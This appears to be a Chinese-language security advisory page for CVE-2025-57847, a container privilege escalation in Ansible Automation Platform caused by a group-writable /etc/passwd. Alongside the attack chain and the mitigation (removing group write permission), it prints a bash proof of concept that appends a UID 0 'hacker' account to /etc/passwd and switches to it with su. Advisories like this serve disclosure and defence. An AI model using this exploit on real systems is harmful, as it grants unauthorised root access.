CVE-2025-57847 CVSS 6.4 中危

CVE-2025-57847 Ansible容器权限提升漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-57847

漏洞类型

权限提升

CVSS评分

6.4 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Ansible Automation Platform

漏洞概述

该漏洞源于Ansible Automation Platform镜像构建过程中/etc/passwd文件权限配置错误。攻击者若在容器内拥有命令执行权限且属于root组，可利用该漏洞修改/etc/passwd文件，添加UID为0的用户从而获取容器root权限。

技术细节

该漏洞存在于Ansible Automation Platform的特定容器镜像中，根本原因是镜像构建过程中/etc/passwd文件的权限被错误设置为“组可写”。在Linux系统中，若文件属于root用户且root组可写，任何属于root组的用户均可修改该文件。攻击者首先需要在容器内获得命令执行权限。随后，利用其账户所在的root组成员身份，直接向/etc/passwd追加包含UID 0的新用户条目。成功写入后，攻击者可切换至该伪造用户，从而在容器内获得完全的Root控制权。

攻击链分析

STEP 1

初始访问

攻击者通过某种方式在受影响的Ansible Automation Platform容器内获得命令执行权限，即使是非root用户。

STEP 2

权限验证

攻击者确认当前用户属于root组，并检查/etc/passwd文件具有组可写权限。

STEP 3

恶意修改

攻击者利用组写权限，向/etc/passwd文件追加一行，创建一个UID为0的新用户。

STEP 4

获取Root

攻击者使用su命令切换到新创建的UID 0用户，成功在容器内提升至Root权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2025-57847: Container Privilege Escalation via /etc/passwd
# Assumption: Attacker has command execution inside the container and is in the 'root' group.

# 1. Check if /etc/passwd is group-writable
ls -l /etc/passwd

# 2. Verify current user groups (look for 'root')
groups

# 3. Exploit: Add a new user 'hacker' with UID 0 (root) to /etc/passwd
# Format: username:password:UID:GID:gecos:home:shell
echo 'hacker:x:0:0:hacker:/root:/bin/bash' >> /etc/passwd

# 4. Verify the entry was added
tail -n 1 /etc/passwd

# 5. Switch to the new root user
su hacker

# 6. Verify root privileges
whoami

影响范围

Ansible Automation Platform (受影响的特定镜像)

防御指南

临时缓解措施

如果不能立即更新镜像，建议进入容器检查/etc/passwd文件权限，使用'chmod g-w /etc/passwd'移除组写权限，并确保容器内非root用户不加入特权组。同时加强对外部访问的控制，防止攻击者获取初始执行权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表